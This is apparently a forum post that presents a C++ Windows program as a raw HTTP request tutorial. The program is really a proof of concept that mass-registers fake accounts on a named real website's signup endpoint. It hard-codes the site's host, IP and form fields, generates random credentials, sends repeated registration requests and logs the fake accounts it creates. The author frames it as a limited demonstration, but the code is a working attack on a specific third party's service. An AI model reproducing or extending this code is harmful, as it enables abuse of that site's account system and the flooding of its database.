This will show u how to properly build a POST/GET request without using wininet api's.
/* KID POC -> lack of security in the account system ( FAKE USERS ) resulting on a database flood. I will not release a true flooder cause i do not want theyre website/database being damaged by bad intentioned users. */ #pragma comment(lib,"wsock32.lib") #include <windows.h> #include <stdio.h> #include <string> #include <sstream> #include <fstream> std::string m_characters( "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890" ); static CHAR* m_emails [ 3 ] = { "hotmail.com", "gmail.com", "yahoo.com" }; UINT GenerateInRange( UINT _min, UINT _max ) { return ( ( rand( ) % ( UINT ) ( ( ( _max ) + 1 ) - ( _min ) ) ) + ( _min ) ); } std::string GeneratePacket( UINT _seed, std::string *_data ) { std::stringstream _form,_packet; std::string _gen; srand( _seed ); _packet << "POST /08member/member_join03_tempok.asp HTTP/1.1"; _packet << "\r\nAccept: text/html, application/xhtml+xml, */*"; _packet << "\r\nReferer: http://kabodonline.net/08member/member_join01_rule.asp"; _packet << "\r\nAccept-Language: en-US"; _packet << "\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"; _packet << "\r\nContent-Type: application/x-www-form-urlencoded"; _packet << "\r\nAccept-Encoding: gzip, deflate"; _packet << "\r\nHost: kabodonline.net"; _packet << "\r\nConnection: Keep-Alive"; _packet << "\r\nCache-Control: no-cache"; _packet << "\r\nContent-Length: "; _form << "id_chk=Y&userAccount="; for( INT i = 0; i < 14; i++ ) //Username _form << m_characters[ GenerateInRange( 0, m_characters.length( ) - 1 ) ]; *_data = _form.str(); for( INT i = 0; i < 14; i++ ) //Password _gen += m_characters[ GenerateInRange( 0, m_characters.length( ) - 1 ) ]; _form << "&userPass1=" << _gen.c_str( ) << "&userPass2=" << _gen.c_str( ); _gen.clear( ); for( INT i = 0; i < 14; i++ )//Email _gen += m_characters[ GenerateInRange( 0, m_characters.length( ) - 1 ) ]; _form << "&userEmail1=" << _gen.c_str( ) << "&userEmail2=" << m_emails[ GenerateInRange( 0, 2 ) ]; _gen.clear( ); //NOT CRUCIAL BUT STILL LAZY FROM THEM -.-' ( YEAR = MONTH ) ( MONTH = DAY ) ( DAY = YEAR ) _form << "&birthdayYear=" << GenerateInRange( 0, 12 ); _form << "&birthdayMonth=" << GenerateInRange( 0, 27 ); _form << "&birthdayDay=" << GenerateInRange( 1900, 1990 ); _form << "&x=" << GenerateInRange( 0, 200 ); _form << "&y=" << GenerateInRange( 0, 200 ); _packet << _form.str( ).length() << "\r\n\r\n" << _form.str( ); _form.clear( ); return _packet.str( ); } BOOL SendFlood( std::string *_info ) { WSADATA _data; std::stringstream _recv; struct sockaddr_in _service; char _buffer [ MAX_SIZE_SECURITY_ID ] = { NULL }; if( WSAStartup( MAKEWORD( 2, 2 ), &_data ) != NO_ERROR ) return FALSE; SOCKET _socket = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP ); if( _socket == INVALID_SOCKET ) return FALSE; _service.sin_family = AF_INET; _service.sin_addr.s_addr = inet_addr( "121.88.250.136" ); _service.sin_port = htons( 80 ); std::string _packet = GeneratePacket( GetTickCount( ), _info ); if( connect( _socket, reinterpret_cast< SOCKADDR* >( &_service ), sizeof( _service ) ) == SOCKET_ERROR ) { closesocket( _socket ); WSACleanup( ); return FALSE; } if( send( _socket, _packet.c_str( ), _packet.length( ), 0 ) == SOCKET_ERROR ) { closesocket( _socket ); WSACleanup( ); return FALSE; } if( shutdown( _socket, 1 ) == SOCKET_ERROR ) { closesocket( _socket ); WSACleanup( ); return FALSE; } INT _result = 0; do { memset( _buffer, NULL, MAX_SIZE_SECURITY_ID ); _result = recv( _socket, _buffer, MAX_SIZE_SECURITY_ID, 0 ); if( _result == NULL ) break; _recv << _buffer; }while( _result > 0 ); if( closesocket( _socket ) == SOCKET_ERROR ) { WSACleanup( ); return FALSE; } WSACleanup(); return _recv.str( ).find( "url=member_join4_complete.asp" ) != std::string::npos ? TRUE : FALSE; } INT __stdcall WinMain( __in HINSTANCE hInstance, __in_opt HINSTANCE hPrevInstance, __in LPSTR lpCmdLine, __in int nShowCmd ) { UNREFERENCED_PARAMETER( hInstance ); UNREFERENCED_PARAMETER( hPrevInstance ); UNREFERENCED_PARAMETER( lpCmdLine ); UNREFERENCED_PARAMETER( nShowCmd ); std::string _info; MessageBox( GetForegroundWindow( ), "this will take some seconds\npress ok to start the test\n", "KID POC - START", MB_OK | MB_ICONINFORMATION ); for( INT i = 0; i < 5; i++ ) { if( SendFlood( &_info ) == FALSE || _info.empty( ) ) continue; std::ofstream _log( "status.txt", std::ios::app ); if( _log.is_open() == FALSE ) continue; _log << "Created fake account: " << _info.c_str() << std::endl; _log.close(); } MessageBox( GetForegroundWindow( ), "please consult status.txt for information\npress ok to close", "KID POC - END", MB_OK | MB_ICONINFORMATION ); return EXIT_SUCCESS; }
Comment